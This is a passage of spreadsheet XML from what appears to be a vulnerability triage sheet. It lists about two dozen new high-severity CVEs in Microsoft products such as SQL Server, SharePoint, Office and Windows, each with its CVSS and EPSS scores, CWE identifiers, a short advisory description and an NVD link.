Medium</t></is></c><c r="B270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C270" s="5" t="inlineStr"><is><t>CVE-2026-67643</t></is></c><c r="D270" s="5" t="n"><v>8.800000000000001</v></c><c r="E270" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F270" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G270" s="5" t="inlineStr" /><c r="H270" s="5" t="n"><v>0.008</v></c><c r="I270" s="5" t="inlineStr" /><c r="J270" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K270" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L270" s="5" t="inlineStr" /><c r="M270" s="5" t="inlineStr" /><c r="N270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P270" s="5" t="inlineStr" /><c r="Q270" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R270" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t></is></c></row><row r="271"><c r="A271" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C271" s="5" t="inlineStr"><is><t>CVE-2026-68775</t></is></c><c r="D271" s="5" t="n"><v>8.800000000000001</v></c><c r="E271" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F271" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G271" s="5" t="inlineStr" /><c r="H271" s="5" t="n"><v>0.005</v></c><c r="I271" s="5" t="inlineStr" /><c r="J271" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K271" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L271" s="5" t="inlineStr" /><c r="M271" s="5" t="inlineStr" /><c r="N271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P271" s="5" t="inlineStr" /><c r="Q271" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R271" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t></is></c></row><row r="272"><c r="A272" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C272" s="5" t="inlineStr"><is><t>CVE-2026-68786</t></is></c><c r="D272" s="5" t="n"><v>8.800000000000001</v></c><c r="E272" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F272" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G272" s="5" t="inlineStr" /><c r="H272" s="5" t="n"><v>0.005</v></c><c r="I272" s="5" t="inlineStr" /><c r="J272" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K272" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L272" s="5" t="inlineStr" /><c r="M272" s="5" t="inlineStr" /><c r="N272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P272" s="5" t="inlineStr" /><c r="Q272" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R272" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t></is></c></row><row r="273"><c r="A273" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C273" s="5" t="inlineStr"><is><t>CVE-2026-68828</t></is></c><c r="D273" s="5" t="n"><v>8.800000000000001</v></c><c r="E273" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F273" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G273" s="5" t="inlineStr" /><c r="H273" s="5" t="n"><v>0.004</v></c><c r="I273" s="5" t="inlineStr" /><c r="J273" s="5" t="inlineStr" /><c r="K273" s="5" t="inlineStr" /><c r="L273" s="5" t="inlineStr" /><c r="M273" s="5" t="inlineStr" /><c r="N273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P273" s="5" t="inlineStr" /><c r="Q273" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R273" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t></is></c></row><row r="274"><c r="A274" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C274" s="5" t="inlineStr"><is><t>CVE-2026-69266</t></is></c><c r="D274" s="5" t="n"><v>8.800000000000001</v></c><c r="E274" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F274" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G274" s="5" t="inlineStr" /><c r="H274" s="5" t="n"><v>0.004</v></c><c r="I274" s="5" t="inlineStr" /><c r="J274" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K274" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L274" s="5" t="inlineStr" /><c r="M274" s="5" t="inlineStr" /><c r="N274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P274" s="5" t="inlineStr" /><c r="Q274" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R274" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t></is></c></row><row r="275"><c r="A275" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C275" s="5" t="inlineStr"><is><t>CVE-2026-69268</t></is></c><c r="D275" s="5" t="n"><v>8.800000000000001</v></c><c r="E275" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F275" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G275" s="5" t="inlineStr" /><c r="H275" s="5" t="n"><v>0.007</v></c><c r="I275" s="5" t="inlineStr" /><c r="J275" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K275" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L275" s="5" t="inlineStr" /><c r="M275" s="5" t="inlineStr" /><c r="N275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P275" s="5" t="inlineStr" /><c r="Q275" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R275" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="S275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t></is></c></row><row r="276"><c r="A276" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C276" s="5" t="inlineStr"><is><t>CVE-2026-69273</t></is></c><c r="D276" s="5" t="n"><v>8.800000000000001</v></c><c r="E276" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F276" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G276" s="5" t="inlineStr" /><c r="H276" s="5" t="n"><v>0.005</v></c><c r="I276" s="5" t="inlineStr" /><c r="J276" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K276" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L276" s="5" t="inlineStr" /><c r="M276" s="5" t="inlineStr" /><c r="N276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P276" s="5" t="inlineStr" /><c r="Q276" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R276" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="S276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t></is></c></row><row r="277"><c r="A277" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C277" s="5" t="inlineStr"><is><t>CVE-2026-69282</t></is></c><c r="D277" s="5" t="n"><v>8.800000000000001</v></c><c r="E277" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F277" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G277" s="5" t="inlineStr" /><c r="H277" s="5" t="n"><v>0.005</v></c><c r="I277" s="5" t="inlineStr" /><c r="J277" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K277" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L277" s="5" t="inlineStr" /><c r="M277" s="5" t="inlineStr" /><c r="N277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P277" s="5" t="inlineStr" /><c r="Q277" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R277" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="S277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t></is></c></row><row r="278"><c r="A278" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C278" s="5" t="inlineStr"><is><t>CVE-2026-69285</t></is></c><c r="D278" s="5" t="n"><v>8.800000000000001</v></c><c r="E278" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F278" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G278" s="5" t="inlineStr" /><c r="H278" s="5" t="n"><v>0.006</v></c><c r="I278" s="5" t="inlineStr" /><c r="J278" s="5" t="inlineStr" /><c r="K278" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L278" s="5" t="inlineStr" /><c r="M278" s="5" t="inlineStr" /><c r="N278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P278" s="5" t="inlineStr" /><c r="Q278" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R278" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t></is></c></row><row r="279"><c r="A279" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C279" s="5" t="inlineStr"><is><t>CVE-2026-69291</t></is></c><c r="D279" s="5" t="n"><v>8.800000000000001</v></c><c r="E279" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F279" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G279" s="5" t="inlineStr" /><c r="H279" s="5" t="n"><v>0.006</v></c><c r="I279" s="5" t="inlineStr" /><c r="J279" s="5" t="inlineStr" /><c r="K279" s="5" t="inlineStr" /><c r="L279" s="5" t="inlineStr" /><c r="M279" s="5" t="inlineStr" /><c r="N279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P279" s="5" t="inlineStr" /><c r="Q279" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R279" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t></is></c></row><row r="280"><c r="A280" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C280" s="5" t="inlineStr"><is><t>CVE-2026-69334</t></is></c><c r="D280" s="5" t="n"><v>8.800000000000001</v></c><c r="E280" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F280" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G280" s="5" t="inlineStr" /><c r="H280" s="5" t="n"><v>0.008</v></c><c r="I280" s="5" t="inlineStr" /><c r="J280" s="5" t="inlineStr" /><c r="K280" s="5" t="inlineStr" /><c r="L280" s="5" t="inlineStr" /><c r="M280" s="5" t="inlineStr" /><c r="N280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P280" s="5" t="inlineStr" /><c r="Q280" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="R280" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t></is></c></row><row r="281"><c r="A281" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C281" s="5" t="inlineStr"><is><t>CVE-2026-69355</t></is></c><c r="D281" s="5" t="n"><v>8.800000000000001</v></c><c r="E281" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F281" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G281" s="5" t="inlineStr" /><c r="H281" s="5" t="n"><v>0.008</v></c><c r="I281" s="5" t="inlineStr" /><c r="J281" s="5" t="inlineStr" /><c r="K281" s="5" t="inlineStr" /><c r="L281" s="5" t="inlineStr" /><c r="M281" s="5" t="inlineStr" /><c r="N281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P281" s="5" t="inlineStr" /><c r="Q281" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R281" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t></is></c></row><row r="282"><c r="A282" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C282" s="5" t="inlineStr"><is><t>CVE-2026-69360</t></is></c><c r="D282" s="5" t="n"><v>8.800000000000001</v></c><c r="E282" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F282" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G282" s="5" t="inlineStr" /><c r="H282" s="5" t="n"><v>0.008</v></c><c r="I282" s="5" t="inlineStr" /><c r="J282" s="5" t="inlineStr" /><c r="K282" s="5" t="inlineStr" /><c r="L282" s="5" t="inlineStr" /><c r="M282" s="5" t="inlineStr" /><c r="N282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P282" s="5" t="inlineStr" /><c r="Q282" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R282" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t></is></c></row><row r="283"><c r="A283" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C283" s="5" t="inlineStr"><is><t>CVE-2026-69386</t></is></c><c r="D283" s="5" t="n"><v>8.800000000000001</v></c><c r="E283" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F283" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G283" s="5" t="inlineStr" /><c r="H283" s="5" t="n"><v>0.008</v></c><c r="I283" s="5" t="inlineStr" /><c r="J283" s="5" t="inlineStr" /><c r="K283" s="5" t="inlineStr" /><c r="L283" s="5" t="inlineStr" /><c r="M283" s="5" t="inlineStr" /><c r="N283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P283" s="5" t="inlineStr" /><c r="Q283" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R283" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t></is></c></row><row r="284"><c r="A284" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C284" s="5" t="inlineStr"><is><t>CVE-2026-69434</t></is></c><c r="D284" s="5" t="n"><v>8.800000000000001</v></c><c r="E284" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F284" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G284" s="5" t="inlineStr" /><c r="H284" s="5" t="n"><v>0.008</v></c><c r="I284" s="5" t="inlineStr" /><c r="J284" s="5" t="inlineStr" /><c r="K284" s="5" t="inlineStr" /><c r="L284" s="5" t="inlineStr" /><c r="M284" s="5" t="inlineStr" /><c r="N284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P284" s="5" t="inlineStr" /><c r="Q284" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R284" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t></is></c></row><row r="285"><c r="A285" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C285" s="5" t="inlineStr"><is><t>CVE-2026-69439</t></is></c><c r="D285" s="5" t="n"><v>8.800000000000001</v></c><c r="E285" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F285" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G285" s="5" t="inlineStr" /><c r="H285" s="5" t="n"><v>0.007</v></c><c r="I285" s="5" t="inlineStr" /><c r="J285" s="5" t="inlineStr" /><c r="K285" s="5" t="inlineStr" /><c r="L285" s="5" t="inlineStr" /><c r="M285" s="5" t="inlineStr" /><c r="N285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P285" s="5" t="inlineStr" /><c r="Q285" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R285" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t></is></c></row><row r="286"><c r="A286" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C286" s="5" t="inlineStr"><is><t>CVE-2026-69442</t></is></c><c r="D286" s="5" t="n"><v>8.800000000000001</v></c><c r="E286" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F286" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G286" s="5" t="inlineStr" /><c r="H286" s="5" t="n"><v>0.008</v></c><c r="I286" s="5" t="inlineStr" /><c r="J286" s="5" t="inlineStr" /><c r="K286" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L286" s="5" t="inlineStr" /><c r="M286" s="5" t="inlineStr" /><c r="N286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P286" s="5" t="inlineStr" /><c r="Q286" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R286" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t></is></c></row><row r="287"><c r="A287" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C287" s="5" t="inlineStr"><is><t>CVE-2026-69461</t></is></c><c r="D287" s="5" t="n"><v>8.800000000000001</v></c><c r="E287" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F287" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G287" s="5" t="inlineStr" /><c r="H287" s="5" t="n"><v>0.008</v></c><c r="I287" s="5" t="inlineStr" /><c r="J287" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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87" s="5" t="inlineStr" /><c r="M287" s="5" t="inlineStr" /><c r="N287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P287" s="5" t="inlineStr" /><c r="Q287" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R287" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t></is></c></row><row r="288"><c r="A288" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C288" s="5" t="inlineStr"><is><t>CVE-2026-69464</t></is></c><c r="D288" s="5" t="n"><v>8.800000000000001</v></c><c r="E288" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F288" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G288" s="5" t="inlineStr" /><c r="H288" s="5" t="n"><v>0.008999999999999999</v></c><c r="I288" s="5" t="inlineStr" /><c r="J288" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K288" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L288" s="5" t="inlineStr" /><c r="M288" s="5" t="inlineStr" /><c r="N288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P288" s="5" t="inlineStr" /><c r="Q288" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="R288" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t></is></c></row><row r="289"><c r="A289" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C289" s="5" t="inlineStr"><is><t>CVE-2026-69465</t></is></c><c r="D289" s="5" t="n"><v>8.800000000000001</v></c><c r="E289" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F289" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G289" s="5" t="inlineStr" /><c r="H289" s="5" t="n"><v>0.008</v></c><c r="I289" s="5" t="inlineStr" /><c r="J289" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K289" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L289" s="5" t="inlineStr" /><c r="M289" s="5" t="inlineStr" /><c r="N289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P289" s="5" t="inlineStr" /><c r="Q289" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R289" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="S289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t></is></c></row><row r="290"><c r="A290" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C290" s="5" t="inlineStr"><is><t>CVE-2026-69485</t></is></c><c r="D290" s="5" t="n"><v>8.800000000000001</v></c><c r="E290" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F290" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G290" s="5" t="inlineStr" /><c r="H290" s="5" t="n"><v>0.008999999999999999</v></c><c r="I290" s="5" t="inlineStr" /><c r="J290" s="5" t="inlineStr" /><c r="K290" s="5" t="inlineStr" /><c r="L290" s="5" t="inlineStr" /><c r="M290" s="5" t="inlineStr" /><c r="N290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P290" s="5" t="inlineStr" /><c r="Q290" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R290" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="S290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t></is></c></row><row r="291"><c r="A291" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C291" s="5" t="inlineStr"><is><t>CVE-2026-69494</t></is></c><c r="D291" s="5" t="n"><v>8.800000000000001</v></c><c r="E291" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F291" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G291" s="5" t="inlineStr" /><c r="H291" s="5" t="n"><v>0.008</v></c><c r="I291" s="5" t="inlineStr" /><c r="J291" s="5" t="inlineStr" /><c r="K291" s="5" t="inlineStr" /><c r="L291" s="5" t="inlineStr" /><c r="M291" s="5" t="inlineStr" /><c r="N291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P291" s="5" t="inlineStr" /><c r="Q291" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="R291" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t></is></c></row><row r="292"><c r="A292" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C292" s="5" t="inlineStr"><is><t>CVE-2026-69495</t></is></c><c r="D292" s="5" t="n"><v>8.800000000000001</v></c><c r="E292" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F292" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G292" s="5" t="inlineStr" /><c r="H292" s="5" t="n"><v>0.008</v></c><c r="I292" s="5" t="inlineStr" /><c r="J292" s="5" t="inlineStr" /><c r="K292" s="5" t="inlineStr" /><c r="L292" s="5" t="inlineStr" /><c r="M292" s="5" t="inlineStr" /><c r="N292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P292" s="5" t="inlineStr" /><c r="Q292" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R292" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t></is></c></row><row r="293"><c r="A293" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C293" s="5" t="inlineStr"><is><t>CVE-2026-69499</t></is></c><c r="D293" s="5" t="n"><v>8.800000000000001</v></c><c r="E293" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F293" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G293" s="5" t="inlineStr" /><c r="H293" s="5" t="n"><v>0.008</v></c><c r="I293" 